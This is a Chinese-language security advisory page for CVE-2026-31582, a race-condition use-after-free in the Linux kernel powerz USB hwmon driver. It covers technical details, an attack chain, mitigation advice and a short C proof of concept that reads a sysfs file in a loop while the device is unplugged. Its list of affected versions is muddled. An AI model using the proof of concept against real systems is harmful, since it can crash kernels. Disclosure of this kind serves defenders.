CVE-2026-31582 CVSS 7.8 高危

CVE-2026-31582: Linux内核powerz驱动释放后使用漏洞

披露日期: 2026-04-24

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31582

漏洞类型

释放后使用 (Use-After-Free)

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的powerz驱动程序在处理USB设备断开连接时存在释放后使用（UAF）漏洞。当设备断开时，`powerz_disconnect`函数执行了URB内存释放，但由于竞态条件，随后的`powerz_read`调用可能在获取互斥锁后，再次访问已被释放的内存地址。这种逻辑缺陷导致系统稳定性受损，攻击者可利用此漏洞导致内核崩溃或潜在的权限提升。

技术细节

该漏洞源于Linux内核`drivers/hwmon/powerz.c`驱动代码中对USB断开事件处理的竞态条件。具体而言，当USB设备触发断开连接时，`powerz_disconnect`函数会调用`usb_free_urb`释放`priv->urb`指向的内存块，并随后释放互斥锁。然而，关键问题在于代码未在释放前将`priv->urb`指针置为NULL，且`usb_set_intfdata`的调用时机晚于hwmon注册。此时，如果用户空间线程通过`hwmon`接口发起读取请求，`powerz_read`函数能够成功获取互斥锁并调用`powerz_read_data`。该函数会直接解引用`priv->urb`指针，导致对已释放内存的访问。这种释放后使用（UAF）行为可能导致内核恐慌，在特定条件下，精心构造的攻击者可能利用此漏洞实现本地权限提升，覆盖敏感内核数据结构。修复方案包括调整注册顺序及增加空指针检查。

攻击链分析

STEP 1

步骤1

攻击者获取本地低权限用户访问权限。

STEP 2

步骤2

攻击者识别系统挂载了受影响的Powerz USB硬件设备。

STEP 3

步骤3

攻击者运行并发程序，持续从对应的hwmon sysfs接口读取数据。

STEP 4

步骤4

攻击者触发设备断开连接（物理拔出或通过软件模拟断开）。

STEP 5

步骤5

系统在清理URB内存的同时处理读取请求，触发释放后使用（UAF）。

STEP 6

步骤6

导致内核崩溃（DoS）或潜在的任意代码执行/权限提升。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * Conceptual PoC for CVE-2026-31582
 * This code attempts to trigger the race condition by reading
 * from the hwmon device while the USB device is disconnected.
 * Requires local access and the specific hardware.
 */

#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>

#define HWMON_PATH "/sys/class/hwmon/hwmonX/temp1_input" // Replace X

volatile int stop = 0;

void* read_hmon(void* arg) {
    char buffer[32];
    int fd = open(HWMON_PATH, O_RDONLY);
    if (fd < 0) {
        perror("Failed to open hwmon device");
        return NULL;
    }

    while (!stop) {
        pread(fd, buffer, sizeof(buffer) - 1, 0);
        // Accessing the device rapidly increases race window
    }
    close(fd);
    return NULL;
}

int main() {
    pthread_t tid;

    printf("Starting PoC for CVE-2026-31582...\n");
    printf("Ensure the Powerz USB device is connected.\n");
    printf("Unplug the device NOW after 3 seconds...\n");

    pthread_create(&tid, NULL, read_hmon, NULL);

    sleep(3);
    printf("Triggering disconnect logic (physically unplug device now)\n");
    
    // Wait for user to unplug or simulate disconnect if possible via software
    sleep(5);
    
    stop = 1;
    pthread_join(tid, NULL);

    printf("PoC execution finished. Check kernel logs for crashes.\n");
    return 0;
}

影响范围

Linux Kernel < v6.6

Linux Kernel < v6.7

Linux Kernel < v6.8

Linux Kernel < v6.9

Linux Kernel < v6.10-rc

防御指南

临时缓解措施

建议立即更新操作系统内核以修复该漏洞。若无法立即更新，应限制对hwmon sysfs接口的读取权限，或物理移除受影响的USB硬件设备，以防止被利用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表